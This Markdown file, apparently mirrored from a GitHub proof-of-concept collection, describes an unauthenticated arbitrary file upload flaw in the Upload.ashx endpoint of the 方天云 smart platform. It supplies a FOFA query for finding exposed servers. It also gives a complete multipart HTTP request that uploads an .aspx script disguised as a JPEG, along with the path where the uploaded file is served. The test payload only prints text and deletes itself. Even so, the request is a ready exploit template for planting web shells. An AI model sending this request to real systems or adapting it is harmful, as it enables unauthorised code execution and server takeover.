mirror of
https://github.com/wy876/POC.git
synced 2025-02-27 04:39:25 +00:00
32 lines
1.1 KiB
Markdown
32 lines
1.1 KiB
Markdown
# 方天云智慧平台系统Upload.ashx存在任意文件上传漏洞
|
|
|
|
方天云智慧平台系统 Upload.ashx 接口处存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
|
|
|
|
## fofa
|
|
|
|
```java
|
|
body="AjaxMethods.asmx/GetCompanyItem"
|
|
```
|
|
|
|
## poc
|
|
|
|
```java
|
|
POST /Upload.ashx HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
|
|
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySl8siBbmVicABvTX
|
|
Connection: close
|
|
|
|
------WebKitFormBoundarySl8siBbmVicABvTX
|
|
Content-Disposition: form-data; name="file"; filename="qwe.aspx"
|
|
Content-Type: image/jpeg
|
|
|
|
<%@Page Language="C#"%><%Response.Write("hello");System.IO.File.Delete(Request.PhysicalPath);%>
|
|
------WebKitFormBoundarySl8siBbmVicABvTX--
|
|
```
|
|
|
|

|
|
|
|
文件路径:`/UploadFile/CustomerFile/回显的路径`
|
|
|
|
 |